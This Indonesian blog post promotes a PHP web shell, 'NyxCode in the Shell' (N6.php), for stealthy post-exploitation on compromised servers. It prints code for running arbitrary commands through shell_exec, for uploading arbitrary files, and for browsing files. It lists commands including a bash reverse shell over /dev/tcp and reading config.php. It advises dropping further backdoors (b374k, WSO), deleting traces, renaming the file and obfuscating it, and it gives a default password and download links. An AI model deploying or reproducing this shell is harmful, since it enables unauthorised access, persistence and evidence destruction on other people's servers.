NyxCode in the Shell - File Manager

NyxCode in the Shell - File Manager

NyxCode in the Shell - File Manager [Stealth]


🕶️ Apa Itu NyxCode in the Shell - File Manager

NyxCode in the Shell - File Manager adalah file manager sekaligus shell command executor yang dibuat oleh kolaborasi NyxCode x 0x6ick. File ini hanya 1 PHP script, cocok untuk:

  • Akses server secara stealth
  • Upload backdoor tambahan
  • Hapus file jejak
  • Eksekusi command seperti ls, cat config.php, uname -a
  • Rename atau delete file target

Tool ini dirancang untuk operasional post-exploitation yang ringan, minim noise, dan cukup powerful buat handler di server kompromi.


📦 Fitur Utama

  • Password Login Simple: Mencegah orang lain asal buka shell tanpa otentikasi.
  • File Explorer: Lihat isi direktori target + navigasi folder.
  • Upload File: Cocok buat drop shell tambahan (contoh: b374k.php).
  • Delete & Rename: Bisa hapus jejak atau ubah nama file target.
  • Command Execution: Eksekusi command terminal langsung dari web.

🕸️ Cuplikan Kode


session_start();
if(!isset($_SESSION['gits_login'])) {
  //…
}

🔐 Password default: ghost.


📂 File Manager Tampilan Terminal Style

  • Folder bisa di-click untuk navigasi
  • File tampil dengan ukuran & permission
  • Aksi: Delete & Rename
foreach($files as $file) {

  echo '<tr><td>'.

    (is_dir($file)

      ? "<a href='?path=$path/$file'>$file</a>"

      : $file).

    '</td><td>'.(is_file($file)?filesize($file):'-').

    '</td><td>'.perms($file).

    '</td><td>'.(is_file($file)

      ? "<a href='$link&act=del'>Delete</a> | <a href='$link&act=rename'>Rename</a>"

      : '-').

    '</td></tr>';

}


🚀 Eksekusi Command via Web

if(isset($_POST['cmd'])) {

  echo '<pre>'.shell_exec($_POST['cmd']).'</pre>';

}

  • whoami
  • ls -la
  • cat config.php
  • uname -a
  • bash -i >& /dev/tcp/ip/port 0>&1

📤 Upload File

if(isset($_FILES['up'])) {

  if(move_uploaded_file($_FILES['up']['tmp_name'], $_FILES['up']['name'])) {

    echo "<p>Upload Success!</p>";

  } else {

    echo "<p>Upload Failed!</p>";

  }

}

Drop tools tambahan seperti b374k shell, WSO, dll.


⚠️ Ethical Hacking

Ingat: Use at your own risk.


📥 Download

Repo: GitHub

Raw: Raw File


🛠️ Tips Stealth & Advanced

  • Ganti password default menjadi unik.
  • Rename file menjadi random seperti a1b2c3.php.
  • Obfuscate script sebelum upload.

🔥 Penutup

Dengan N6.php, kini kau punya file manager + shell yang stealth dan powerful.

"In the shell we trust — 0x6ick"

Post a Comment

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About